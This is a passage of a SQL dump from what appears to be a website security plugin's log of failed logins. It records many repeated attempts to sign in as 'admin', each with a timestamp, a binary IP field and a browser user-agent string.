Safari/537.36'),(4381,6848,1628903799.537034,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��12�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4382,6855,1628906036.363604,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���]�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(4383,6856,1628906211.816593,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4384,6857,1628906611.156633,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���֣%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4385,6859,1628907278.332687,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gm','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4386,6860,1628907440.660393,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6\'iX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4387,6861,1628908232.633029,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4388,6862,1628908529.570291,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4389,6864,1628909097.249129,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4390,6866,1628909899.484227,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4391,6867,1628910266.343662,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4392,6869,1628910886.665893,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4393,6870,1628911024.733129,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��vE��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4394,6871,1628911216.489153,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4395,6872,1628911570.871178,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4396,6873,1628911861.610862,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��U���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4397,6875,1628912270.109442,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���]�S','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4398,6877,1628912832.086150,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��[�|�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4399,6878,1628913156.704176,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4400,6879,1628913502.432027,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4401,6880,1628913509.032748,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(4402,6881,1628913809.054375,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����vv','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4403,6882,1628914161.111318,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4404,6883,1628914448.005458,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4405,6887,1628915758.383989,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���1K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4406,6888,1628916052.845176,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��u,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4407,6889,1628916379.446768,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-OuI','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4408,6890,1628916696.579969,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6�Y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4409,6891,1628917044.051331,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4410,6892,1628917296.905432,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4411,6893,1628917328.350071,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4412,6894,1628917647.829941,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4413,6895,1628917961.613562,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����j�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4414,6896,1628918278.065553,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k�*�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4415,6897,1628918599.914016,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��O���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4416,6898,1628919266.387347,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4417,6899,1628919548.875712,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����x�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4418,6900,1628919806.097200,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4419,6903,1628920527.067333,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4420,6906,1628921142.645875,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gx�V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4421,6907,1628921460.147625,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4422,6908,1628921804.044907,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4423,6909,1628922123.783338,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4424,6910,1628922329.769996,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>|�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(4425,6913,1628923555.874472,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4426,6914,1628923878.769540,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4427,6915,1628924210.780561,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4428,6916,1628924848.112446,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���h,q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4429,6917,1628924866.632157,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(4430,6918,1628925166.373261,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��w`�;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4431,6919,1628925485.171006,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4432,6920,1628925839.212636,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ś�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4433,6921,1628926132.212039,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��n-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4434,6922,1628926459.230660,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����R%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4435,6922,1628926459.279880,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����R%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4436,6923,1628926823.430735,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4437,6924,1628927133.789499,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"Q�6','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4438,6925,1628927401.291602,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H�*','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4439,6926,1628927427.248047,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��=o�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4440,6927,1628927762.990184,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4441,6928,1628928092.100980,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���֖]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4442,6928,1628928092.113692,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���֖]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4443,6929,1628928427.930530,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4444,6930,1628928661.805875,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_��[','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4445,6931,1628928761.432328,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ٓ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4446,6932,1628929384.528953,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4447,6933,1628929726.035514,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��P��o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4448,6934,1628929919.784602,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/� ','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4449,6935,1628930063.389343,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ٓ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4450,6936,1628930371.052651,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4451,6937,1628930704.281676,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4452,6938,1628931032.472876,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4453,6939,1628931179.430002,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4454,6940,1628931371.577150,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����Er','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4455,6941,1628931724.529627,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���~�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4456,6942,1628932022.974316,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k�*�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4457,6943,1628932393.197178,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4458,6944,1628932692.625457,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4459,6946,1628933358.631287,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"DaF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4460,6947,1628933684.332719,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4461,6948,1628934042.739885,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4462,6949,1628934357.981781,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4463,6950,1628934708.088090,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Q���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4464,6951,1628934958.787008,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���_S�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4465,6952,1628935011.734680,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4466,6954,1628935707.523685,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4467,6957,1628936347.472954,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g��R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4468,6958,1628936677.260181,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-72c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4469,6959,1628937010.790424,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g/<,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4470,6960,1628937397.627354,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4471,6961,1628937680.329568,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4472,6965,1628938758.886760,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(4473,6966,1628939011.836958,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�\n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4474,6967,1628939692.949205,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4475,6971,1628940837.321040,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4476,6974,1628942518.510356,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4477,6976,1628944498.794549,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(4478,6987,1628951580.051955,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4479,6988,1628951580.854429,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4480,6989,1628951581.717242,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4481,6990,1628951582.722723,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4482,6991,1628951583.535059,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4483,6992,1628951584.411088,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4484,6993,1628951585.448437,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4485,6994,1628951586.287451,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4486,6995,1628951587.091578,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4487,6996,1628951587.858436,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4488,6997,1628951588.666318,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4489,6997,1628951588.676259,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4490,6998,1628951589.457568,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4491,6999,1628951590.387875,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4492,7000,1628951591.293416,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4493,7001,1628951592.187759,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4494,7002,1628951593.074703,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4495,7003,1628951593.913212,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4496,7004,1628951594.699526,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(4497,7008,1628952039.956166,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���� m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4498,7009,1628952399.004943,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(4499,7010,1628953732.775828,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����B','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(4500,7011,1628954189.214877,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\r^�,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4501,7013,1628955987.812009,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4502,7014,1628956370.231464,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����8�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(4503,7015,1628957651.057976,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;v�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4504,7016,1628957710.416158,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) 